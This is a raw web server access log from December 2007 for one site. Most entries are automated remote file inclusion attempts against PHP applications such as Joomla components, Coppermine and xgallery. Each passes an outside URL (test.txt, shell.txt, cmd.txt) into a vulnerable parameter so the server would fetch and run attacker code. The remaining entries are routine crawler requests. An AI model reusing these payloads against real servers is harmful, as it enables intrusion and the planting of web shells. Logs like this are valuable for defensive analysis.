66.186.18.99 - - [29/Dec/2007:13:07:11 -0800] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:13:07:33 -0800] "GET /logs//auctions//includes/settings.inc.php?include_path=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:13:07:33 -0800] "GET //auctions//includes/settings.inc.php?include_path=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
87.118.106.191 - - [29/Dec/2007:13:08:35 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://deniamusic.com/keplek.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.118.106.191 - - [29/Dec/2007:13:08:35 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://deniamusic.com/keplek.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.118.106.191 - - [29/Dec/2007:13:08:35 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://deniamusic.com/keplek.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:13:09:50 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:13:09:50 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:13:10:01 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:13:10:01 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
87.118.106.191 - - [29/Dec/2007:13:12:53 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://deniamusic.com/keplek.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:13:13:49 -0800] "GET /logs//components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:13:13:49 -0800] "GET //components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
209.31.183.20 - - [29/Dec/2007:13:14:27 -0800] "GET /logs/access_071214.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.20 - - [29/Dec/2007:13:14:27 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.20 - - [29/Dec/2007:13:14:27 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.15.104.155 - - [29/Dec/2007:13:14:54 -0800] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
68.15.104.155 - - [29/Dec/2007:13:15:02 -0800] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:13:15:08 -0800] "GET //squirrelcart/cart_content.php?cart_isp_root=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:13:15:08 -0800] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
72.36.115.68 - - [29/Dec/2007:13:15:26 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
72.36.115.68 - - [29/Dec/2007:13:15:26 -0800] "GET /logs/access_070901.log HTTP/1.0" 200 28607 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
207.44.147.74 - - [29/Dec/2007:13:15:46 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.74 - - [29/Dec/2007:13:15:47 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.74 - - [29/Dec/2007:13:15:47 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.77.102.94 - - [29/Dec/2007:13:17:16 -0800] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
208.77.102.94 - - [29/Dec/2007:13:17:16 -0800] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
68.15.104.155 - - [29/Dec/2007:13:17:25 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
68.15.104.155 - - [29/Dec/2007:13:17:25 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
207.44.147.74 - - [29/Dec/2007:13:17:54 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:13:19:16 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:13:19:16 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
65.55.209.205 - - [29/Dec/2007:13:21:01 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.205 - - [29/Dec/2007:13:21:02 -0800] "GET /retreat1/ HTTP/1.0" 200 15065 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.205 - - [29/Dec/2007:13:21:03 -0800] "GET /tools/ HTTP/1.0" 200 12388 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
68.15.104.155 - - [29/Dec/2007:13:21:18 -0800] "GET //tags.php?BBCodeFile=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
68.15.104.155 - - [29/Dec/2007:13:21:19 -0800] "GET /logs//tags.php?BBCodeFile=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
65.55.165.83 - - [29/Dec/2007:13:21:40 -0800] "GET /tools/ HTTP/1.0" 200 12388 "http://search.live.com/results.aspx?q=chinese&mrt=en-us&FORM=LIVSOP" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "www.dmulk.com"
65.55.165.83 - - [29/Dec/2007:13:21:41 -0800] "GET /tools/css/phpmyadmin.css.php?lang=en&js_frame=right&js_isDOM=1 HTTP/1.0" 200 12232 "http://www.dmulk.com/tools/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "www.dmulk.com"
62.193.248.97 - - [29/Dec/2007:13:24:39 -0800] "GET /logs/access_071129.log/convert/mvcw.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.248.97 - - [29/Dec/2007:13:24:40 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.248.97 - - [29/Dec/2007:13:24:40 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
155.245.50.3 - - [29/Dec/2007:13:27:04 -0800] "GET /logs/access_071215.log//components/com_simpleboard/image_upload.php?sbp=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
155.245.50.3 - - [29/Dec/2007:13:27:05 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
155.245.50.3 - - [29/Dec/2007:13:27:05 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.248.97 - - [29/Dec/2007:13:27:51 -0800] "GET /logs/access_071215.log/convert/mvcw.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:13:28:25 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:13:28:25 -0800] "GET //skin/zero_vote/error.php?dir=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.77.102.94 - - [29/Dec/2007:13:29:38 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
208.77.102.94 - - [29/Dec/2007:13:29:38 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.36.115.43 - - [29/Dec/2007:13:30:49 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
72.36.115.43 - - [29/Dec/2007:13:30:49 -0800] "GET /logs/access_070830.log HTTP/1.0" 200 30370 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
205.234.215.83 - - [29/Dec/2007:13:33:12 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://randymac.com/myevent/var/echo? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
205.234.215.83 - - [29/Dec/2007:13:33:12 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://randymac.com/myevent/var/echo? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
74.6.22.163 - - [29/Dec/2007:13:39:40 -0800] "GET /tmp/sess_5411016a3b8167fd9b6c2459e7db9458 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.68.248 - - [29/Dec/2007:13:40:19 -0800] "GET /logs/access_071214.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.248 - - [29/Dec/2007:13:40:19 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.248 - - [29/Dec/2007:13:40:19 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.215.83 - - [29/Dec/2007:13:40:24 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://randymac.com/myevent/var/echo? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
205.234.215.83 - - [29/Dec/2007:13:40:24 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://randymac.com/myevent/var/echo? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.6.22.163 - - [29/Dec/2007:13:46:45 -0800] "GET /logs/access_070920.log HTTP/1.0" 200 56600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.163 - - [29/Dec/2007:13:46:45 -0800] "GET /logs/access_070808.log HTTP/1.0" 200 84948 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.163 - - [29/Dec/2007:13:46:47 -0800] "GET /logs/access_071107.log HTTP/1.0" 200 32202 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.163 - - [29/Dec/2007:13:46:50 -0800] "GET /logs/access_071025.log HTTP/1.0" 200 25205 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.163 - - [29/Dec/2007:13:46:54 -0800] "GET /logs/access_070813.log HTTP/1.0" 200 98487 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.163 - - [29/Dec/2007:13:46:54 -0800] "GET /logs/access_071111.log HTTP/1.0" 200 72697 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:13:50:37 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:13:50:37 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:13:50:38 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.32.2.242 - - [29/Dec/2007:13:51:52 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [29/Dec/2007:13:51:52 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [29/Dec/2007:13:51:52 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.208.81.132 - - [29/Dec/2007:13:57:20 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [29/Dec/2007:13:57:20 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [29/Dec/2007:13:57:20 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.naimaa.com/templates/r00t/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [29/Dec/2007:13:57:20 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [29/Dec/2007:13:57:20 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.naimaa.com/templates/r00t/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [29/Dec/2007:13:57:21 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.naimaa.com/templates/r00t/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.25.154 - - [29/Dec/2007:14:05:36 -0800] "GET /logs/access_071207.log HTTP/1.0" 200 248258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:14:05:48 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:14:05:49 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:14:10:17 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:14:10:17 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.222 - - [29/Dec/2007:14:11:31 -0800] "GET /mobileoffice/?S=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.19.169 - - [29/Dec/2007:14:18:39 -0800] "GET /funny/?M=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:14:22:15 -0800] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.205.123.49 - - [29/Dec/2007:14:34:19 -0800] "GET /logs/home.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
74.205.123.49 - - [29/Dec/2007:14:34:19 -0800] "GET /home.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:14:35:42 -0800] "GET /logs/file.php?go1=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:14:35:42 -0800] "GET /file.php?go1=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
209.31.183.20 - - [29/Dec/2007:14:36:52 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.20 - - [29/Dec/2007:14:36:52 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.20 - - [29/Dec/2007:14:36:52 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:14:38:20 -0800] "GET /home.php?=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:14:38:20 -0800] "GET /logs/home.php?=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:14:39:21 -0800] "GET /home.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:14:39:21 -0800] "GET /logs/home.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:14:39:32 -0800] "GET /index.php?p=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:14:39:32 -0800] "GET /logs/index.php?p=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:14:40:13 -0800] "GET /home.php?pag=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:14:40:13 -0800] "GET /logs/home.php?pag=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:14:41:32 -0800] "GET /contact.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:14:41:32 -0800] "GET /logs/contact.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
74.205.123.49 - - [29/Dec/2007:14:43:29 -0800] "GET /menu.php?=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
74.205.123.49 - - [29/Dec/2007:14:43:29 -0800] "GET /logs/menu.php?=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:14:43:52 -0800] "GET /contact.php?pag=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:14:43:52 -0800] "GET /logs/contact.php?pag=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
